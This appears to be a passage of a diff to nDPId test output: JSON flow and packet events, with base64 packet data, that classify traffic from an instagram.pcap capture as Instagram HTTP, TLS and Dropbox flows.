vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="} +00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"} 
+02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/JgmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40kmN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3
EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="} +00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1436720906017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"thread_ts_msec":1436720906017,"pkt":"\/\/\/\/\/\/\/\/ABZEH1lmCABFAACDA5AAAIARdcjAqABq\/\/\/\/\/0RcRFwAb\/+ueyJob3N0X2ludCI6IDQxMzc2NzExNiwgInZlcnNpb24iOiBbMSwgOF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDA5Mjk0MDNdfQ=="} 00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906017,"flow_last_seen":1436720906017,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906017,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
@@ -52,193 +52,193 @@ 00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1436720906022,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1436720906025,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1436720906025,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906025,"pkt":"\/\/\/\/\/\/\/\/ABsv8H60CABFAAA0BsVAAEARsaPAqAABwKgA\/wIIAggAILagAgEAAAACAADAqAAAAAAAAAAAAAAAAAAB"} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906070,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"flow_min_l4_payload_len":613,"flow_max_l4_payload_len":613,"flow_tot_l4_payload_len":613,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1436720906070,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720906070,"pkt":"QPMIw47hABsv8H60CABFAAKZYWZAAFUGhKgfDV00wKgAZwG7hI6seG5hv38UHoAYAGuTKQAAAQEICltMYqkAA+18FwMBAmCl7hwsC927JcFSAZYWLzz9PCOE13q\/R1R\/4Ep\/l7+HHbIpOFFcCYs42I3wFOgWiBw3wjx3pJOgTGydZF67jt6\/BKND+v8oyfRpnqlS5YMAWUNymHV7uHWxp+hxonkw6cNC93nRZtrxzkz6LP0NT0kghBPZC1Qj+5R6TJU9O4JNVgnaOk7a2PLjjlpxNviWyDprqQXVx0ggqtiTSBMr7Uc5EfDpzAAkL4Ijs+Gp7u5RRsTL\/vjjpIbFtLB91jbWUmuE049zO8Z0ZXe+NUKtpOUeDZz+3zpQ7uf3ydorfitQX7zdybIk3\/bzSVhOShF3BJrYBLAD2AQ24us0\/KfVGECFrd6OK2BQqjf6ncI9qOXNwiVF\/2inbzY\/Q3OsYRcS7XHEaq0O5REHcT8SzE5VoLX4XXQtBoZwVB5Yrj77GtBQdmGZD6u8UMQpctBx6N9Mr51OWWfdFnAbts6SnZuXGzlYjqJOxS7Vx73Uw8fCkf1IEri8UI1qbM9veDNciQdo3CmVyvU7iM87rUz7C0f+A4f1opsUJ5+EheBr1eGc36Efb4\/Ualnnz3nkJR3hncStDick4US+OxlgvGof266YJgZuAwCGxYg4vW2knDKYz5umzCws7lIHpIdAFNPByVtoUTPTPQS5UKgIEdb95j7F6DccGwtWvRW1Al5LucPJI7zWS2dtNSdT\/Ojj1Rno0QRGwZ45j0In5POotAgCjk30MTwIN5HhcpigFfTCmuPMsYmTn6MoC7DboyOfYCjSc6fhkNqfZ2xyKSzKyqklgdTHeGfRwO+op5ygRsksmKTJ1Q\/4mw=="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1436720906070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720906070,"pkt":"ABsv8H60QPMIw47hCABFAAA0Ga9AAEAG48TAqABnHw1dNISOAbu\/fxQerHhwxoAQAW09dwAAAQEICgAD7YxbTGKp"} -01772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1436720908201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908201,"pkt":"ABsv8H60QPMIw47hCABFAAPpGbBAAEAG4A7AqABnHw1dNISOAbu\/fxQerHhwxoAYAW1v8wAAAQEICgAD7mFbTGKpFwMBA7AOHMI1ALyiYU3ya6qg+prWQI\/n9ANspqMl7L4ePI46MbeMU\/IIKBcoHTRp\/G5Sihc5nIJHuC2+37mEcl691gW4u\/TM4cTkpTf1jvX2GQ4y6\/txghh7z8FoXfNbqCHIq72qOYxX78zowj+FiMRcWPEmeWcWoH+gdWfhPA\/lkpOWh7PAWcTM6YhVbfKMzFVog0eNO6nAQ6Db4QV49GBIVCzfrXCBVeXZAcW0CL72bBYmhxsuCeKWPO3s6v5st61\/TqBX2wKyuhuh0iYRoQoS\/wYMoppq1iw5UM\/55LosXWjVhX+LnpSLv52m8IfyQkh1vrv+SJ7KjFgIF5haejMGRgEB6k28tUeT6FGaiUo32klBF\/ovhJ\/7PzYE5+p1Zs2WdUsskxD79HTvK6ta+oXXgI8zxnT+FY6f4Y3Qg+b6yTS68sbWyHT6\/PezdvhWfHtL0SSgHp8goibROD\/tT\/ewXwhvrOEixGKhip+cFDAiL8AxMi3V3Lo6cis85J1puKveGyk09JQyFUAk\/2r5Yl++ASyNB2yelevEI5wg+VsEb8Rcm\/QA7noQyfs1T5YOnO8NCBiPmye5eIk\/wZxnX1f+2xdUrgycDikO6k0cQg3utcfRP10t4qmvTrg2ek70WkuE+ATLg2Um1eRaeb81BxGpDBojTreWbcm5dcICJMpu5Jn\/w\/\/OFgLDd8zIcqEDUouT6ZCScciar49BKHurWy8NKFla9SI75KJQz9yq3QZyAG0rJc2lhQMyl9+7b4Ogizx8Jo29kTu8fZJSlg+ABrC1jcExXQD49OmAnZxwfKy6D2pC9Rse0qtqmzV+ovVEbJp+oxkyoXka2nmc36kfQhlZgI7KVixFLMTTlCevMnYrq1xJ\/MKzvCd6IWf+N5EocWD+ilOqptHNEIAOXJmgXODhL5KGWjQb8\/91W1IyUi6q\/ngSGvVRUpY8iujk6L\/C+Bbj\/Dm4AkcumBcragxaghvlWXmc47QSkqomVkZppr19doVE596Z\/iAcdVNM
q1wy+2v27UYh5CMr3l5X59P07fb7g36BHbE7SHRjrHyy9CTFMxhEf0YgUq5TdIHDFI5lE\/KxLNZVidU3ki5Un7VFtJrfQka6os1jVOGfB9pUZq5Qsmwf1i\/ygu+C28zlN53MQWP6wHjI3WJZUBr81SukNH57IK2c2EyIu0E+HAgTgoJHe51A\/fUmZ1cYv7+JWrlM8pRHdKg4V83a8+0QRZUGb14qwNk4zB82iOuTyKlfeqGDo1mtsQ=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908216,"flow_last_seen":1436720908216,"flow_idle_time":7440000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908216,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1436720908216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908216,"pkt":"ABsv8H60QPMIw47hCABFAAPpl5BAAEAGYi7AqABnHw1dNISPAbuBQH+NqOzE9YAYAR7+6wAAAQEICgAD7mJbGFWXFwMBA7DGXKcxYYzj4PsFQPMmYQehh8iuvFDU6ChyMypfRInDCFuixSLIKOq63dIUv38njMJN2kVy\/t+T8m9xPVbEGAFdD3PpSc3SZZnBHiv5tCRNZzMhDLWXPkOIN9Lutipqd5IVnEEsBFkO\/fZ2K81T8PYPXOUELo\/sV11FwruvuAKdrrJSJDxsNb8ZavjfuhrjTCNZ8992aq+Ku9jOSU4Xa7Q\/BYCty1PvPxxBeD0eYCG+tOtkysHtjUZlr1d4OQxDr\/61YS0x9iJOXjnMBoobCu17VKBkd2hUXNptzi\/uIUhzamB9Rremxs\/xa5ErUN6bjCfTqClJMKTo2+EPLLC2OrnUwhZPfwAqX4LMjZxrO4OjWeKTq0PJEWrYJt\/hZgR9r16F85siGrf6FK1kTDvb0+vybKakTv5L4R+tKZVBNuaZabfxVkkl5TNMskAuzgaRl4NAmD9vaxsUvWa1r1eavZpU2b4i3TllipunjR4aQEFb47bl0X9Ru9Hl1x54J53nJ+MJknrPmdJbHBa5kRwAqKgaQptXtnMz1WTWV+Q8a53Upaic+O0txvujdC90+KUOiiTbhfTw0gAmNmPQmi2l+V2tphQpp2jEsWxETCl2LSUnlcR9XDLGnBO3KYnN9C0+k2yBKCMObHAcOzwdJWheAOhM
NBVSNpFtrfOE6uSTsVbDj23xeCxxC1QAM7YJmxoVRhtdVyIDYYANmHTFeA\/uC6oLDeExrKyQP7kSEfNbdUqTNPu\/MJKIjJDZu1yLmyvi1O\/nGho5EDKw8IVXPxnfKKPvaQH2GtI88pEfGeAEyC\/HE\/tmFwWll7dh2qPp5A3wF8sKJ3O0eDAbcGfPED7oJA+EsxJAhKT6isvErCueBtWMHVSeiLsoME8tf6cS9zzgnk33LczZTQgm29MSHE7ZL2GeiGbzuGwrTGDnk1VDLJRove2wMug8H7\/TzDu7ltmYb22OyZHWPR+qBc0SXnC41HvKpdG4l5lloyRu51PXhn1Z4SBmRKxgHOd10WPpGH9Et\/GeMS7LFYrc7oqcb6G7UCvo5VgI1SuJrJeY0vV2tCM0MyJYykeRmE4\/7F1xpcmuoE1e5ET3+6eiLGpqXUS7VkABwgQafZxjQScCWI5pekzUYOfjX5epPROl\/DzQKTCdpj3Gvhf2XBY54ImjWPLE32kUQllKDfXNIYtYFjXJbjsc4Zka4\/X4kGWgbCWN+dmnakKME8cbt\/+4rEk8PQFIv1W4FPcpki7hccXc0xhFEqm0Sw=="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1436720908259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908259,"pkt":"QPMIw47hABsv8H60CABFAAA0u1VAAFUGLR4fDV00wKgAZwG7hI+o7MT1gUCDQoAQAFyKzgAAAQEIClsYbBQAA+5i"} 
-02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":1436720908432,"pkt":"QPMIw47hABsv8H60CABFAAWqu1ZAAFUGJ6cfDV00wKgAZwG7hI+o7MT1gUCDQoAQAFzmhwAAAQEIClsYbL0AA+5iFwMBBgCkPdU4R6wGSIS3keHeixTLTI9zV+il0PpZ8q91YamIsd4IZ1iA9S2D6W\/nJ4T6403w2+fJe+hdEKNsk0963CdXOEXDNkQKpXOBBE+0Y\/4Fle8ueshRyGFFEoc6PtZpKpwayy+TKxEJ4pFJyX2oGMWjaZzaOyD59AskeV\/YOll+Xm0S27uMjZKkLBkCxDNPTNhB8fh\/syM9nxdE4huEu1SgtsgSRap7+5OfSJa0vJji4Lac5HIGGpVuCAdsaWkkirxUeGhBT5KqUaH3z34YK2q9OCFDjG6zQx+K5wB6\/1tRpCV4T0Wdq9iazWqTK9fhu3Q8m7M+n+OlMsKGxDIEQhTmUFv6EsILdWY4XaXzsNt68ilI12u8FIErHj5xADP5BSss+D\/PqbyyYfj1siM7kMLTpiPXuCUljd29w+P7wtJOUzlqcHwFv60jtkmE5R7DR9LN47rlhx2ZgEX8b9nsvGl\/Z1KSCJ1m3XV6f0806axX94l9imfNEVAHweCX3kOlfFNWODbpNzNbLbpVtPn7xKRA5Y140DajcNQvyREJ7DrHWIxbEPKUq+SIMaNEJqDkl0rYnPqvJYuixcmcTK6joyocw7sF+MmuWuJzAwYoGvQacoqaNqOp0iEPlyz8x6cTF7HbzVKHlLYHsfsKMGz98miVsnjvci5f7S+qZN8wJt+ycMpErrmm5SYVwnyDiARUnY01FjBiu7oXosmSU8r8tl1Y7oQcefwWQmUMJwEVoICnXk5o\/1P1fTAJawMxQor10OxDf\/BV8+4BnkZNbktKhC4u6rpy4t9mTFTFoJnekuOgtsyuYF1D1pTovQynkNog8sbNDLg6lOVy2sSjtN38M5BrjfWP6NvWf5rAbsDm9Qvw2VUkrLm+vXfuLJeKqhTOHspJB2ZVScw6fgqCCRgXV4hbT47jXkZHPFeUj3xtv5oznldP1XEp\/Y0YyZnWCMaWATZlGVUiSYeiFbrcd70L0WujcTQSesgJzHbOqeptYMiDDVIYXi5utFDZis9FPZA2ul\/lArmvEL\/urLFDKdnXMnNjyIIqJtwWZlcpDAHOfD2KyMM51NtnpD3NXBz6ngCZNoi3DrWeJbaK2NX4FFrr9nkmfuHb0MC